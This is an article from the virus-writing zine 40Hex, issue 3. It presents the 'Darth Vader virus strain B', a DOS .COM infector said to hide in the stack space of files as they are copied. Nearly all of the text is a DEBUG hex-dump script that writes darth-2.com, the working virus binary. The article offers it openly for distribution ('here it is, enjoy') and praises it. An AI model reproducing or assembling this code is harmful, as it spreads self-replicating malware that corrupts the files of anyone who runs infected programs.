 40Hex Issue 3                                                      0007

                     The Darth Vader Virus Strain B

     The Darth Vader virus is pretty cool because it is a little
     differnt than most other viruses.  Instead of going resident
     and infecting all programs run, it infects the stack space
     of all .COM files, as they are copied.  Pretty cool, huh?

     This virus only infects .COM files with a stack space equal
     to its own size.

     It's orgin is Bulgeria, hmmm, has Bulgeria become the virus
     captial of the world all of a sudden???

     Well here it is, enjoy.

------------------------------------------------------------------------------
n darth-2.com
e 0100  E8 00 00 5E 83 EE 03 89 36 F0 00 A3 FE 00 31 C0
e 0110  8E D8 8E 06 AE 00 B8 00 90 8E D8 31 FF 47 81 FF
e 0120  00 0F 77 58 57 31 F6 B9 58 01 F3 A6 5F E3 02 EB
e 0130  EC 2E 8B 36 F0 00 2E 89 3E F2 00 0E 1F B9 58 01
e 0140  F3 A4 06 1F 8B F7 46 74 33 56 AD 93 AC 81 FB 36
e 0150  FF 74 03 5E EB F0 3C 16 75 F9 5E 56 2E 8B 3E F2
e 0160  00 89 3E 04 00 81 C7 41 01 A5 A5 A4 5F B0 9A AA
e 0170  B8 95 00 2E 03 06 F2 00 AB 8C C0 AB 0E 0E 1F 07
e 0180  BF 00 01 57 8B 36 F0 00 81 C6 47 01 A5 A4 A1 FE
e 0190  00 C3 E9 9C 00 2E 8C 1E 0A 00 2E 89 16 0C 00 2E
e 01A0  89 0E 0E 00 50 53 51 06 56 57 80 FC 40 75 E3 81
e 01B0  F9 68 01 72 DD B8 20 12 CD 2F 26 8A 1D B8 16 12
e 01C0  CD 2F 83 C7 28 0E 1F BE 4A 01 03 36 04 00 B9 03
e 01D0  00 F3 A6 75 5C 1E 07 2E 8E 1E 0A 00 2E 8B 36 0C
e 01E0  00 BF 47 01 2E 03 3E 04 00 A5 A4 B8 00 90 8E C0
e 01F0  2E 8B 0E 0E 00 31 FF 46 49 74 36 51 56 B9 58 01
e 0200  F3 A6 5E E3 03 59 EB ED 59 56 1E 2E 8E 06 0A 00
e 0210  2E 8B 3E 0C 00 B0 E9 AA 2E 2B 36 0C 00 83 EE 03
e 0220  8B C6 AB 07 5F 0E 1F 2E 8B 36 04 00 B9 58 01 F3
e 0230  A4 5F 5E 07 59 5B 58 2E 8B 16 0C 00 2E 8E 1E 0A
e 0240  00 00 00 00 00 00 CB CD 20 90 43 4F 4D 44 61 72
e 0250  74 68 20 56 61 64 65 72 90 1A 1A 1A 1A 1A 1A 1A
rcx
159
w
q
-------------------------------------------------------------------------------


